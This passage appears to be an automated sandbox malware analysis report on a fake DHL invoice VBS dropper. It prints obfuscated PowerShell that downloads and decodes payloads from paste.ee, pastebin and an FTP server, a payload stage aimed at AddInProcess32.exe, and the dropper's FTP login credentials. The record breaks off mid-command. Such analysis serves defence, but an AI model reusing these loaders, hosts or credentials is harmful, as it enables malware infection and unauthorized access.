                                                                                                2024-10-22 04:17:16 UTC1369INData Raw: 37 4d 32 4f 2b 73 44 48 36 63 76 4f 6f 72 54 32 36 51 42 4f 47 6a 6a 48 34 49 77 4e 2b 64 54 59 7a 55 35 4d 50 4f 7a 65 7a 30 31 4d 4c 4e 6a 52 78 63 65 4d 7a 47 6a 67 78 77 58 4d 56 41 6a 4b 77 73 42 4d 50 41 41 41 41 51 4b 41 46 41 48 41 41 41 77 50 2f 2f 6a 34 2f 6f 39 50 77 2b 54 61 2f 6b 30 50 39 38 54 4d 2f 30 78 50 52 34 7a 72 2b 63 71 50 4a 36 54 67 2b 6b 6e 50 78 35 54 61 2b 6f 52 50 2b 7a 54 63 38 63 47 50 39 77 44 4d 37 34 38 4f 39 75 7a 74 37 49 37 4f 73 75 6a 6a 37 55 34 4f 38 74 7a 5a 36 4d 75 4f 4b 72 6a 67 36 41 6e 4f 6a 70 44 57 36 51 6a 4f 45 6b 7a 39 35 30 64 4f 79 6c 6a 4d 34 38 7a 4e 2f 61 7a 34 32 34 35 4d 67 50 6a 32 78 6f 62 4d 78 46 54 54 78 6f 54 4d 75 45 6a 49 78 59 42 4d 52 44 54 75 77 34 49 4d 76 42 44 58 77 41 46 4d 45 42 7a
                                                                                                Data Ascii: 7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xPR4zr+cqPJ6Tg+knPx5Ta+oRP+zTc8cGP9wDM748O9uzt7I7Osujj7U4O8tzZ6MuOKrjg6AnOjpDW6QjOEkz950dOyljM48zN/az4245MgPj2xobMxFTTxoTMuEjIxYBMRDTuw4IMvBDXwAFMEBz
                                                                                                2024-10-22 04:17:16 UTC1369INData Raw: 77 48 4f 37 68 6a 4a 34 59 78 4e 35 66 54 68 32 41 74 4e 70 56 54 34 31 51 5a 4e 4a 57 54 64 31 67 56 4e 68 51 7a 33 30 34 36 4d 79 4f 7a 6f 7a 63 35 4d 48 4f 6a 61 7a 49 32 4d 34 49 54 34 79 55 74 4d 4a 4c 54 74 79 6b 71 4d 48 4a 7a 50 79 45 69 4d 5a 49 54 45 79 6b 51 4d 39 47 6a 58 78 59 42 4d 36 44 44 76 77 49 4c 4d 51 43 44 66 77 38 46 4d 77 41 54 47 41 41 41 41 38 43 41 42 51 44 41 41 41 38 6a 36 2f 55 39 50 46 2b 54 59 2b 67 6c 50 30 30 6a 69 39 41 55 50 6a 77 44 38 38 67 4e 50 50 78 7a 4e 38 73 79 4f 31 76 6a 34 37 51 36 4f 56 75 6a 56 36 45 76 4f 58 71 44 6a 36 38 6e 4f 63 70 6a 50 35 45 59 4f 34 67 7a 35 34 6f 4d 4f 32 69 54 4a 32 45 74 4e 43 5a 7a 49 32 51 51 4e 5a 54 7a 62 7a 49 30 4d 59 4d 6a 44 79 34 6b 4d 6b 49 44 42 78 45 64 4d 34 42 44 37
                                                                                                Data Ascii: wHO7hjJ4YxN5fTh2AtNpVT41QZNJWTd1gVNhQz3046MyOzozc5MHOjazI2M4IT4yUtMJLTtykqMHJzPyEiMZITEykQM9GjXxYBM6DDvwILMQCDfw8FMwATGAAAA8CABQDAAA8j6/U9PF+TY+glP00ji9AUPjwD88gNPPxzN8syO1vj47Q6OVujV6EvOXqDj68nOcpjP5EYO4gz54oMO2iTJ2EtNCZzI2QQNZTzbzI0MYMjDy4kMkIDBxEdM4BD7
                                                                                                2024-10-22 04:17:16 UTC1369INData Raw: 36 4f 39 74 44 4f 34 77 43 4f 61 67 44 46 79 55 6d 4d 66 46 44 37 78 59 65 4d 49 47 54 57 78 38 55 4d 46 42 41 41 41 77 44 41 45 41 47 41 41 41 67 50 67 33 44 34 39 6b 42 50 2f 7a 44 37 38 49 4e 50 2f 79 54 70 37 63 37 4f 78 75 7a 48 36 6f 52 4f 69 6c 7a 57 35 41 55 4f 36 6b 7a 4d 35 55 53 4f 61 6b 7a 45 34 59 4f 4f 4e 6a 7a 4b 32 51 71 4e 68 59 44 42 31 77 66 4e 7a 58 7a 78 31 55 45 4e 30 54 44 37 30 6b 4a 4e 68 4a 6a 42 77 67 44 4d 6f 41 41 41 41 51 46 41 45 41 46 41 2f 4d 2b 50 6b 2b 54 49 2b 49 6d 50 49 31 7a 32 39 41 64 50 2b 32 44 75 37 63 5a 4f 35 6e 44 55 35 30 77 4e 74 66 54 59 33 41 6b 4e 31 62 54 36 32 55 74 4e 50 62 54 78 32 6f 72 4e 32 59 6a 4c 32 59 69 4e 58 59 54 44 32 49 51 4e 4f 58 6a 6c 30 38 49 4e 55 52 6a 46 7a 6f 2f 4d 6d 50 6a 6d 7a
                                                                                                Data Ascii: 6O9tDO4wCOagDFyUmMfFD7xYeMIGTWx8UMFBAAAwDAEAGAAAgPg3D49kBP/zD78INP/yTp7c7OxuzH6oROilzW5AUO6kzM5USOakzE4YOONjzK2QqNhYDB1wfNzXzx1UEN0TD70kJNhJjBwgDMoAAAAQFAEAFA/M+Pk+TI+ImPI1z29AdP+2Du7cZO5nDU50wNtfTY3AkN1bT62UtNPbTx2orN2YjL2YiNXYTD2IQNOXjl08INURjFzo/MmPjmz
                                                                                                2024-10-22 04:17:16 UTC1369INData Raw: 4e 4c 4d 44 38 7a 6f 2b 4d 63 50 7a 75 7a 73 36 4d 6d 4f 44 6c 78 63 44 4d 54 41 41 41 41 77 46 41 44 41 4b 41 41 41 77 50 45 2f 54 4e 2b 77 64 50 35 77 7a 34 34 77 71 4e 77 62 44 36 32 49 75 4e 4b 62 54 4b 30 30 46 4e 4d 4e 54 53 79 34 74 4d 5a 4c 54 77 79 63 6e 4d 58 4a 7a 42 78 59 62 4d 31 46 6a 53 77 45 50 4d 66 44 7a 31 77 38 46 41 41 41 41 51 41 4d 41 6b 41 38 44 71 2f 77 35 50 4b 2b 54 5a 2f 73 31 50 4c 39 6a 52 2f 34 7a 50 4f 38 54 43 2f 51 67 50 34 37 54 30 2b 77 73 50 48 37 7a 75 2b 63 70 50 53 36 54 6a 2b 45 6f 50 64 35 44 57 2b 4d 6c 50 4b 35 7a 49 2b 34 68 50 5a 34 54 43 39 63 65 50 5a 33 54 7a 39 34 62 50 69 32 44 65 39 41 58 50 5a 31 54 53 39 30 51 50 42 6f 54 6e 35 49 57 4f 30 6b 6a 4c 35 49 79 4e 6d 66 6a 34 33 34 39 4e 61 66 6a 31 33 49
                                                                                                Data Ascii: NLMD8zo+McPzuzs6MmODlxcDMTAAAAwFADAKAAAwPE/TN+wdP5wz44wqNwbD62IuNKbTK00FNMNTSy4tMZLTwycnMXJzBxYbM1FjSwEPMfDz1w8FAAAAQAMAkA8Dq/w5PK+TZ/s1PL9jR/4zPO8TC/QgP47T0+wsPH7zu+cpPS6Tj+EoPd5DW+MlPK5zI+4hPZ4TC9cePZ3Tz94bPi2De9AXPZ1TS90QPBoTn5IWO0kjL5IyNmfj4349Nafj13I
                                                                                                2024-10-22 04:17:16 UTC1369INData Raw: 32 78 54 59 38 73 46 50 44 78 7a 4c 38 63 79 4f 66 76 54 32 37 45 38 4f 62 75 6a 69 37 41 34 4f 68 70 6a 74 36 55 51 4f 58 6d 6a 69 35 55 59 4f 6b 6c 7a 58 35 6f 56 4f 4a 6c 7a 47 34 73 4c 4f 53 69 7a 51 33 73 2b 4e 53 66 6a 79 33 4d 36 4e 57 65 44 4f 33 34 79 4e 63 63 6a 46 33 38 67 4e 36 62 44 31 32 4d 73 4e 7a 61 7a 70 32 51 70 4e 42 61 6a 4d 32 59 51 4e 6f 57 54 6c 31 6b 55 4e 44 56 6a 49 31 30 52 4e 54 55 44 43 30 34 50 4e 30 54 6a 37 30 67 4f 4e 69 54 44 33 30 6f 4d 4e 41 54 44 75 30 30 4b 4e 6e 53 54 6f 30 6f 49 4e 43 53 54 52 30 30 44 4e 76 51 54 4a 30 59 42 4e 4c 51 6a 42 30 41 77 4d 6e 50 6a 33 7a 6b 39 4d 4b 50 6a 76 7a 73 36 4d 6a 4f 7a 6a 7a 59 34 4d 42 4f 44 65 7a 4d 33 4d 73 4e 54 58 7a 63 31 4d 4b 4a 44 64 79 6f 6d 4d 67 4a 6a 56 79 77 6b
                                                                                                Data Ascii: 2xTY8sFPDxzL8cyOfvT27E8Obuji7A4Ohpjt6UQOXmji5UYOklzX5oVOJlzG4sLOSizQ3s+NSfjy3M6NWeDO34yNccjF38gN6bD12MsNzazp2QpNBajM2YQNoWTl1kUNDVjI10RNTUDC04PN0Tj70gONiTD30oMNATDu00KNnSTo0oINCSTR00DNvQTJ0YBNLQjB0AwMnPj3zk9MKPjvzs6MjOzjzY4MBODezM3MsNTXzc1MKJDdyomMgJjVywk


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.449741188.114.96.34431928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-22 04:17:20 UTC43OUTGET /d/r322U/0 HTTP/1.1
                                                                                                Host: paste.ee
                                                                                                2024-10-22 04:17:21 UTC1225INHTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:21 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Content-Length: 582
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=2592000
                                                                                                strict-transport-security: max-age=63072000
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block
                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vtyiMkN5cyj%2BWQQSptCtqMBmum7BJd1wjGGJjIj5Yp3N9WZgqO4V83%2F5krvAAYizkhUwyNDf94PsppiCuxolt9EvlMn8DmMfemV4FhvrnPQOSvx8%2Fuin243Rew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad5a5d254686-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-10-22 04:17:21 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 31 39 33 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 33 39 39 33 33 37 26 63 77 6e 64 3d 32 35 31 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 65 37 63 33 31 61 64 32 38 35 65 36 66 33 37 30 26 74 73 3d 33 30 34 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1193&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=2399337&cwnd=251&unsent_bytes=0&cid=e7c31ad285e6f370&ts=304&x=0"
                                                                                                2024-10-22 04:17:21 UTC582INData Raw: 24 7a 73 62 44 74 20 3d 20 27 43 3a 5c 57 69 6e 64 6f 77 73 5c 4d 69 63 72 6f 73 6f 66 74 2e 4e 45 54 5c 27 20 2b 20 27 46 72 61 6d 65 77 6f 72 6b 5c 76 34 2e 30 2e 33 30 33 31 39 5c 27 20 2b 20 27 41 64 64 49 6e 50 72 6f 63 65 73 73 33 32 2e 65 78 65 27 3b 0a 0a 24 58 6f 68 73 4b 20 3d 20 22 3f 3f 25 79 7a 58 56 4d 25 22 0a 0a 24 55 65 62 54 61 20 3d 20 27 e2 86 93 3a e2 86 93 27 3b 0a 24 58 4b 76 48 76 20 3d 20 27 41 27 3b 0a 0a 24 57 59 76 74 74 20 3d 20 27 25 71 6c 78 4b 50 25 27 2e 72 65 70 6c 61 63 65 28 20 24 55 65 62 54 61 2c 20 24 58 4b 76 48 76 20 29 3b 0a 5b 42 79 74 65 5b 5d 5d 20 24 6c 61 57 77 4a 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 20 24 57 59 76 74 74 20 29 3b 0a
                                                                                                Data Ascii: $zsbDt = 'C:\Windows\Microsoft.NET\' + 'Framework\v4.0.30319\' + 'AddInProcess32.exe';$XohsK = "??%yzXVM%"$UebTa = ':';$XKvHv = 'A';$WYvtt = '%qlxKP%'.replace( $UebTa, $XKvHv );[Byte[]] $laWwJ = [System.Convert]::FromBase64String( $WYvtt );


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.449744104.20.4.2354437820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-22 04:17:24 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-22 04:17:24 UTC391INHTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: EXPIRED
                                                                                                Last-Modified: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad6f6ac1a912-DFW
                                                                                                2024-10-22 04:17:24 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                                                                Data Ascii: 6false,
                                                                                                2024-10-22 04:17:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.449746104.20.4.2354438100C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-22 04:17:27 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-22 04:17:27 UTC395INHTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:27 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 3
                                                                                                Last-Modified: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad80fc5d6bbc-DFW
                                                                                                2024-10-22 04:17:27 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                                                                Data Ascii: 6false,
                                                                                                2024-10-22 04:17:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.449749104.20.4.2354432676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-22 04:17:35 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-22 04:17:35 UTC396INHTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:35 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 11
                                                                                                Last-Modified: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66adb4dad53ab8-DFW
                                                                                                2024-10-22 04:17:35 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                                                                Data Ascii: 6false,
                                                                                                2024-10-22 04:17:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.449750104.20.4.2354437972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-22 04:17:44 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-22 04:17:44 UTC396INHTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:44 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 20
                                                                                                Last-Modified: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66adee4c613ac7-DFW
                                                                                                2024-10-22 04:17:44 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                                                                Data Ascii: 6false,
                                                                                                2024-10-22 04:17:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.449751104.20.4.2354436644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-22 04:17:52 UTC74OUTGET /raw/pQQ0n3eA HTTP/1.1
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-22 04:17:52 UTC396INHTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:52 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 28
                                                                                                Last-Modified: Tue, 22 Oct 2024 04:17:24 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ae1f7df56c07-DFW
                                                                                                2024-10-22 04:17:52 UTC11INData Raw: 36 0d 0a 66 61 6c 73 65 2c 0d 0a
                                                                                                Data Ascii: 6false,
                                                                                                2024-10-22 04:17:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                FTP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                Oct 22, 2024 06:17:05.341645956 CEST2149730191.252.83.213192.168.2.4220 "Servico de FTP da Locaweb"
                                                                                                Oct 22, 2024 06:17:05.342750072 CEST4973021192.168.2.4191.252.83.213USER desckvbrat1
                                                                                                Oct 22, 2024 06:17:05.618324995 CEST2149730191.252.83.213192.168.2.4331 Username ok, send password.
                                                                                                Oct 22, 2024 06:17:05.618571043 CEST4973021192.168.2.4191.252.83.213PASS BFwGyaUBMY1578@@
                                                                                                Oct 22, 2024 06:17:05.896672010 CEST2149730191.252.83.213192.168.2.4230 Login successful.
                                                                                                Oct 22, 2024 06:17:06.168792009 CEST2149730191.252.83.213192.168.2.4501 Invalid argument.
                                                                                                Oct 22, 2024 06:17:06.169037104 CEST4973021192.168.2.4191.252.83.213PWD
                                                                                                Oct 22, 2024 06:17:06.440356016 CEST2149730191.252.83.213192.168.2.4257 "/" is the current directory.
                                                                                                Oct 22, 2024 06:17:06.440857887 CEST4973021192.168.2.4191.252.83.213TYPE I
                                                                                                Oct 22, 2024 06:17:06.712142944 CEST2149730191.252.83.213192.168.2.4200 Type set to: Binary.
                                                                                                Oct 22, 2024 06:17:06.712310076 CEST4973021192.168.2.4191.252.83.213PASV
                                                                                                Oct 22, 2024 06:17:06.984183073 CEST2149730191.252.83.213192.168.2.4227 Entering passive mode (191,252,83,213,234,209).
                                                                                                Oct 22, 2024 06:17:06.993275881 CEST4973021192.168.2.4191.252.83.213RETR Upcrypter/01/DLL01.txt
                                                                                                Oct 22, 2024 06:17:07.265403032 CEST2149730191.252.83.213192.168.2.4150 File status okay. About to open data connection.
                                                                                                Oct 22, 2024 06:17:07.765045881 CEST2149730191.252.83.213192.168.2.4226 Transfer complete.
                                                                                                Oct 22, 2024 06:17:10.595839977 CEST4973021192.168.2.4191.252.83.213PASV
                                                                                                Oct 22, 2024 06:17:10.910274982 CEST4973021192.168.2.4191.252.83.213PASV
                                                                                                Oct 22, 2024 06:17:11.517538071 CEST4973021192.168.2.4191.252.83.213PASV
                                                                                                Oct 22, 2024 06:17:11.911505938 CEST2149730191.252.83.213192.168.2.4227 Entering passive mode (191,252,83,213,235,2).
                                                                                                Oct 22, 2024 06:17:11.917931080 CEST4973021192.168.2.4191.252.83.213RETR Upcrypter/01/Rumpe.txt
                                                                                                Oct 22, 2024 06:17:12.189333916 CEST2149730191.252.83.213192.168.2.4150 File status okay. About to open data connection.
                                                                                                Oct 22, 2024 06:17:12.674597025 CEST2149730191.252.83.213192.168.2.4226 Transfer complete.
                                                                                                Oct 22, 2024 06:17:19.147663116 CEST4973021192.168.2.4191.252.83.213PASV
                                                                                                Oct 22, 2024 06:17:19.419469118 CEST2149730191.252.83.213192.168.2.4227 Entering passive mode (191,252,83,213,237,38).
                                                                                                Oct 22, 2024 06:17:19.425901890 CEST4973021192.168.2.4191.252.83.213RETR Upcrypter/01/Entry.txt
                                                                                                Oct 22, 2024 06:17:19.698240995 CEST2149730191.252.83.213192.168.2.4150 File status okay. About to open data connection.
                                                                                                Oct 22, 2024 06:17:20.183093071 CEST2149730191.252.83.213192.168.2.4226 Transfer complete.

                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:00:16:58
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs"
                                                                                                Imagebase:0x7ff722590000
                                                                                                File size:170'496 bytes
                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:1
                                                                                                Start time:00:16:59
                                                                                                Start date:22/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg' + [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAKQApACkAIAA0ADYALAA0ADYALAA2ADUALAA1ADUALAAzADUALAA5ADQALAA5ADgALAA3ADcALAA2ADYALAA1ADgALAAgADcAOQAsACAAMQAyADEALAAgADEANwAgACwAOQAxADEAIAAsADAANwAgACwANgA2ACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 